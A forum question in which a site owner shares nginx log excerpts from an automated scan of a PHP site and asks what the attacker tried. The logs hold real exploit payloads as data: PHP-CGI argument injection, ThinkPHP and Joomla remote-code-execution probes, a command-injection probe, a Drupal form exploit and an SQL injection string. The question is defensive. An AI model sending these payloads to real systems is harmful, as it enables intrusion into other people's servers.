There seems to have been an attempt to attack my website

Question

I am using PHP as a server side language. And I don't use CMS or Framework. From the nginx log the website attack seems obvious.

I wonder what kind of attack the attacker attempted.

The attacker sent 941 malicious queries over a period of about 5 minutes, some of which are listed below.

--- Nginx Log 1 ---

[23/Mar/2020:03:24:02 +0000] "POST /Admin06f42d34/Login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:03 +0000] "GET /l.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86"
[23/Mar/2020:03:24:04 +0000] "GET /phpinfo.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86"
[23/Mar/2020:03:24:05 +0000] "GET /test.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0" "218.75.30.86"
[23/Mar/2020:03:24:06 +0000] "POST /index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:06 +0000] "POST /bbs.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:06 +0000] "POST /forum.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:07 +0000] "POST /forums.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:08 +0000] "POST /bbs/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:08 +0000] "POST /forum/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:08 +0000] "POST /forums/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0" "218.75.30.86"
[23/Mar/2020:03:24:09 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86"
[23/Mar/2020:03:24:09 +0000] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86"
[23/Mar/2020:03:24:11 +0000] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 301 178 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)" "218.75.30.86"
[23/Mar/2020:03:24:20 +0000] "POST /%62%61%73%65/%70%6F%73%74%2E%70%68%70 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0" "218.75.30.86"
[23/Mar/2020:03:24:20 +0000] "GET /webdav/ HTTP/1.1" 301 178 "-" "Mozilla/5.0" "218.75.30.86"
[23/Mar/2020:03:24:21 +0000] "GET /%69%73%70%69%72%69%74/%69%6D/%75%70%6C%6F%61%64%2E%70%68%70 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:21 +0000] "GET /help.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:22 +0000] "GET /java.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:22 +0000] "GET /_query.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:23 +0000] "GET /test.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:23 +0000] "GET /db_cts.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:23 +0000] "GET /db_pma.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:24 +0000] "GET /logon.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:24 +0000] "GET /help-e.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:24 +0000] "GET /license.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:24 +0000] "GET /log.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:25 +0000] "GET /hell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:25 +0000] "GET /pmd_online.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:25 +0000] "GET /x.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:26 +0000] "GET /shell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:26 +0000] "GET /htdocs.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:27 +0000] "GET /b.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:27 +0000] "GET /sane.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:28 +0000] "GET /desktop.ini.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:28 +0000] "GET /z.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:28 +0000] "GET /lala.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:29 +0000] "GET /lala-dpr.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"

--- Nginx Log 2 ---

[23/Mar/2020:03:24:37 +0000] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:38 +0000] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:38 +0000] "GET /scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:39 +0000] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:39 +0000] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:39 +0000] "GET /pma/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:39 +0000] "GET /PMA/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:40 +0000] "GET /myadmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:40 +0000] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"

--- Nginx Log 3 ---

[23/Mar/2020:03:24:41 +0000] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:41 +0000] "GET /MyAdmin/scripts/db___.init.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:42 +0000] "GET /plugins/weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:42 +0000] "GET /cacti/plugins/weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:42 +0000] "GET /weathermap/editor.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:43 +0000] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:43 +0000] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:43 +0000] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:43 +0000] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:44 +0000] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:44 +0000] "GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:44 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:45 +0000] "GET /joomla/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:45 +0000] "GET /Joomla/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:45 +0000] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:45 +0000] "GET /d7.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:46 +0000] "GET /rxr.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:46 +0000] "GET /1x.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:24:46 +0000] "GET /home.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"

--- Nginx Log 4 ---

[23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:06 +0000] "POST /wp-includes/css/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:07 +0000] "POST /wp-includes/fonts/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:07 +0000] "POST /wp-includes/modules/modules.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:08 +0000] "POST /wp-includes/modules/wp-config.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:08 +0000] "POST /wp-includes/modules/wp-login.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:08 +0000] "POST /shell.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:09 +0000] "POST /data/admin/help.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:09 +0000] "POST /12.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:10 +0000] "POST /ecmsmod.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:10 +0000] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86"
[23/Mar/2020:03:29:10 +0000] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86"
[23/Mar/2020:03:29:10 +0000] "GET /weaver/bsh.servlet.BshServlet HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86"
[23/Mar/2020:03:29:11 +0000] "GET /solr/ HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0" "218.75.30.86"
[23/Mar/2020:03:29:12 +0000] "POST /index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" "218.75.30.86"
[23/Mar/2020:03:29:12 +0000] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" "218.75.30.86"
[23/Mar/2020:03:29:12 +0000] "GET / HTTP/1.1" 301 178 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36" "}__test|O:21:\x22JDatabaseDriverMysqli\x22:3:{s:2:\x22fc\x22;O:17:\x22JSimplepieFactory\x22:0:{}s:21:\x22\x5C0\x5C0\x5C0disconnectHandlers\x22;a:1:{i:0;a:2:{i:0;O:9:\x22SimplePie\x22:5:{s:8:\x22sanitize\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}s:8:\x22feed_url\x22;s:56:\x22die(md5(DIRECTORY_SEPARATOR));JFactory::getConfig();exit\x22;s:19:\x22cache_name_function\x22;s:6:\x22assert\x22;s:5:\x22cache\x22;b:1;s:11:\x22cache_class\x22;O:20:\x22JDatabaseDriverMysql\x22:0:{}}i:1;s:4:\x22init\x22;}}s:13:\x22\x5C0\x5C0\x5C0connection\x22;b:1;}\xF0\xFD\xFD\xFD, 218.75.30.86"
[23/Mar/2020:03:29:13 +0000] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 301 178 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\x22id\x22;s:3:\x22'/*\x22;s:3:\x22num\x22;s:141:\x22*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36" "218.75.30.86"

--- Nginx Log5 ---

[23/Mar/2020:03:29:13 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:14 +0000] "GET /phpMyAdmin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:14 +0000] "GET /pmd/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:14 +0000] "GET /pma/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:15 +0000] "GET /PMA/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:15 +0000] "GET /PMA2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:15 +0000] "GET /pmamy/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:15 +0000] "GET /pmamy2/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:16 +0000] "GET /mysql/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
[23/Mar/2020:03:29:16 +0000] "GET /admin/index.php HTTP/1.1" 301 178 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "218.75.30.86"
